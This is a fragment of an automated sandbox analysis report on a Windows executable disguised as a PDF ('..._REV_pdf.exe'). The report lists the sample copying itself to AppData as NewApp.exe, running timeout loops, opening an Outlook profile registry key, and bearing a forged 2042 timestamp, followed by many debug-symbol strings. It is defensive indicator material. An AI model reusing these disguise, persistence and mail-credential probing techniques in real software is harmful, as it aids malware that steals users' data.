                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Process created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: A4-058000200390-10-14_REV_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: A4-058000200390-10-14_REV_pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: NewApp.PDB source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbcB source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.673776774.0000000004C7B000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: dnsapi.pdbJ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb` source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbjB source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp, NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: urlmon.pdb* source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: iVisualBasic.pdb\3 source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb@ source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb)gc}+ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb, source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb> source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb" source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: rasadhlp.pdb& source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbx source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: iVisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.PDB source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: winhttp.pdbn source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbw_ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb4 source: WerFault.exe, 0000000B.00000003.685897028.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb^ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: winnsi.pdbL source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Server source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: fwpuclnt.pdbF source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbh source: WerFault.exe, 0000001A.00000003.799925426.000000000523B000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp, NewApp.exe, 00000012.00000002.815445862.00000000011F5000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\NewApp\NewApp.PDB source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb[ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp, NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: psapi.pdb!-0 source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb9\ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697430851.00000000010DF000.00000004.00000020.sdmp
                      Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb` source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: msasn1.pdbt source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: ml.pdb&& source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: dhcpcsvc.pdbP source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb* source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb* source: NewApp.exe, 00000012.00000002.815445862.00000000011F5000.00000004.00000020.sdmp
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp
                      Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: NewApp.exe, 00000013.00000002.816014888.00000000009F0000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Roaming\NewApp\NewApp.PDBn^ source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: rtutils.pdbr source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: .pdb8h source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbr source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.pdbrr source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbl.* source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: A4-058000200390-10-14_REV_pdf.PDBZ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: edputil.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp

                      Data Obfuscation:

                      Binary contains a suspicious time stamp
                      Source: initial sample Static PE information: 0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 0_2_00E9E47A push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 0_2_00E9E685 push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 0_2_00E9E65C push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 0_2_00E9E890 push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 0_2_00E9EAEF push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 0_2_00E9EA18 push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 0_2_00E97D59 pushad ; retf 0005h
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 0_2_00E99E51 push 00A405CAh; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 0_2_05CE267B pushad ; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 8_2_063AAA1C push es; iretd
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 8_2_063A465E push cs; ret
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe Code function: 8_2_063AE431 push esi; iretd
